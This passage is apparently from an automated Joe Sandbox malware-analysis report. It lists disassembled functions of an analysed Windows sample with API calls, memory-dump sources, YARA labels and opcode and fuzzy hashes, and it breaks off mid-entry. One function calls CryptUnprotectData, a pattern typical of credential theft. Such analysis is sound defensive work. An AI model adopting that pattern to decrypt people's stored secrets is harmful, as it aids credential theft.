                            • RtlAllocateHeap.NTDLL(00000000), ref: 00357A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00FBDEC0,00000000,?,00360E10,00000000,?,00000000,00000000,?), ref: 00357A7D
                            • wsprintfA.USER32 ref: 00357AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: fed6c7f4036c051f71ee061334710b492c4222d7551be58bc13deda673b6a258
                            • Instruction ID: 80d00f46cc3b92038be748f0a790f86011bd52bcb779cd57212ec67c17de5865
                            • Opcode Fuzzy Hash: fed6c7f4036c051f71ee061334710b492c4222d7551be58bc13deda673b6a258
                            • Instruction Fuzzy Hash: 4B115EB1D45218EBEB208B54DC49FAAB778FB04721F10439AEE1AA32D0D7745A48CF51
                            Function 00707C29 Relevance: 5.3, Strings: 3, Instructions: 1592COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 78}v$;vf${@z
                            • API String ID: 0-3765021230
                            • Opcode ID: 86f88ec5208b84d5c07e4bfd0647b7f507f8f1bdd2c07fda4c183db17fdfa33e
                            • Instruction ID: 01164b9f130f347939563935b3a1f39347f7578fb79d5fe1d6f2d8a07ba53499
                            • Opcode Fuzzy Hash: 86f88ec5208b84d5c07e4bfd0647b7f507f8f1bdd2c07fda4c183db17fdfa33e
                            • Instruction Fuzzy Hash: BEB2D6F260C204AFE304AE29EC8567AFBE9EF94720F16493DE6C4C3744EA3558458797
                            Function 00353720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(0035E118,00000000,00000001,0035E108,00000000), ref: 00353758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003537B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: d82470b241de5d09396da9ad92e93decb5b990685338eee1db3253df3faa8f10
                            • Instruction ID: bef2c9eb68e244717e77a2f13ec893a6822debd0c548252a8027279bbf5644ab
                            • Opcode Fuzzy Hash: d82470b241de5d09396da9ad92e93decb5b990685338eee1db3253df3faa8f10
                            • Instruction Fuzzy Hash: E941F971A00A189FDB24DB58CC94F9BB7B4BB48702F4051D8EA08EB2E0D7716E89CF50
                            Function 00349B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00349BA3
                            • LocalFree.KERNEL32(?), ref: 00349BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: cc13e54735f7245244bff232f5392c7253fba6fa3496be38b28e825a41f86445
                            • Instruction ID: cf9b2388e6abef8248b8de3d6c9c484d2106e4119ca2e79567b4207f58506fda
                            • Opcode Fuzzy Hash: cc13e54735f7245244bff232f5392c7253fba6fa3496be38b28e825a41f86445
                            • Instruction Fuzzy Hash: DD11A5B8A00209EFDB05DF94D985AAEB7B5FB88300F104599ED15AB350D774AE14CFA1
                            Function 007010F4 Relevance: 4.2, Strings: 2, Instructions: 1650COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 3yww$I 6
                            • API String ID: 0-4004495414
                            • Opcode ID: 79d50df5c63e05bac4c0fff3486ee12e28675a545e3c6fd93f5542b360a85d67
                            • Instruction ID: 92f20c5a219848d9dbd31dfa86872d90f22c32a59602254787084b8f9592f8b5
                            • Opcode Fuzzy Hash: 79d50df5c63e05bac4c0fff3486ee12e28675a545e3c6fd93f5542b360a85d67
                            • Instruction Fuzzy Hash: E0B209F3A0C2109FE304AE2DEC8567ABBE9EF94320F1A853DE6C5D7744E93558018796
                            Function 0071035F Relevance: 2.7, Strings: 1, Instructions: 1450COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: }7_
                            • API String ID: 0-480581156
                            • Opcode ID: 6b2a779d526ba3a9c3c795dc73b03b46a1fa8ca493bfe15d4b700910ee66762f
                            • Instruction ID: 46d73c75b1d8cccfff8cf61a0d02327c971d2ea494ec8b34da389e042ebd2ba8
                            • Opcode Fuzzy Hash: 6b2a779d526ba3a9c3c795dc73b03b46a1fa8ca493bfe15d4b700910ee66762f
                            • Instruction Fuzzy Hash: 5AA2E5F390C2049FE304AE29EC8567AFBE9EF94720F16492DEAC4C7344E63598458797
                            Function 00648DAB Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $W$AR>
                            • API String ID: 0-3542059997
                            • Opcode ID: 20e4ba2d992577e4226f9b0303d7b33c35c59fcb52b02e84b14dbf41e311742b
                            • Instruction ID: 42eeb0a1076f1a884f03dfc84fa85bdc7b6ae626f7b99d659c44dca8a242f170
                            • Opcode Fuzzy Hash: 20e4ba2d992577e4226f9b0303d7b33c35c59fcb52b02e84b14dbf41e311742b
                            • Instruction Fuzzy Hash: 974186F3A087141BE308696CEC85767B2CADB90220F2A823EEA84D3380FC795C0542C2
                            Function 006C0D8F Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: c,vW
                            • API String ID: 0-3052020306
                            • Opcode ID: fc973f77d3612c2072e180cc04e09aa49fc22a7ba7223921958d36faf495c7b5
                            • Instruction ID: f334c0474e9cc746d90c68af34cf02a758ffa7bab90eeda69a0aee85a50bf067
                            • Opcode Fuzzy Hash: fc973f77d3612c2072e180cc04e09aa49fc22a7ba7223921958d36faf495c7b5
                            • Instruction Fuzzy Hash: E3517DF3E1C6109FE3041A2DDC847A6B6D6EBD8324F2BC63DE684D3788E9755C018685
                            Function 007A17DD Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: M?L
                            • API String ID: 0-1957247074
                            • Opcode ID: d813d30ccb83d34713b70e1b4bea9e544d27d24516366f8b39ee18d1033cbaeb
                            • Instruction ID: 6b1f56d24e7c92673ff6cd8e89e408845a41f0ef15bc3342aef6ff47f77b58d2
                            • Opcode Fuzzy Hash: d813d30ccb83d34713b70e1b4bea9e544d27d24516366f8b39ee18d1033cbaeb
                            • Instruction Fuzzy Hash: F851F4B360D204EFE3086E19AC9167BF7E9EBD5320FA5473DE6C247310E9396800E646
                            Function 00632A96 Relevance: .2, Instructions: 209COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 94aa699a30d598d18c41acd30c37dcc5aacecd135834e4ca6f1e378d974a0eeb
                            • Instruction ID: db803b2e01a02774b58e0a0774cb4cd948af8210f8514fbffae84e0ec08b2dd5
                            • Opcode Fuzzy Hash: 94aa699a30d598d18c41acd30c37dcc5aacecd135834e4ca6f1e378d974a0eeb
                            • Instruction Fuzzy Hash: DC5149B39181109FE3049B29DC417BABBE6EF94320F1A8A3DE9C8D7744E6394C5187D6
                            Function 005B43DE Relevance: .2, Instructions: 200COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9341e428aae73b0b17378a4da0558bc7c06c4aa8f688ba32851233b73396a04
                            • Instruction ID: c4144d1e5d889d13ce9d422b0ec42f559a18924d6bad3401554284dc829b462e
                            • Opcode Fuzzy Hash: a9341e428aae73b0b17378a4da0558bc7c06c4aa8f688ba32851233b73396a04
                            • Instruction Fuzzy Hash: FA5155F3A082144BE7146E2CDC4977ABBE5EB90320F06463DDFC987784E936590883C6
                            Function 006070F3 Relevance: .2, Instructions: 199COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 88697b4c2b1542ebc09310a6817f3202826b939713b6b897853bebb8ce241ad0
                            • Instruction ID: 4db35ccf2c0a37c7baed2902173d1bdbd56c3959b19a2ee12ffcf5821474f7fe
                            • Opcode Fuzzy Hash: 88697b4c2b1542ebc09310a6817f3202826b939713b6b897853bebb8ce241ad0
                            • Instruction Fuzzy Hash: 315106F3B186045FF300A92DEC817BB77D6DBD4760F29C639A784C3B84E97898054295
                            Function 005EC9B5 Relevance: .2, Instructions: 199COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
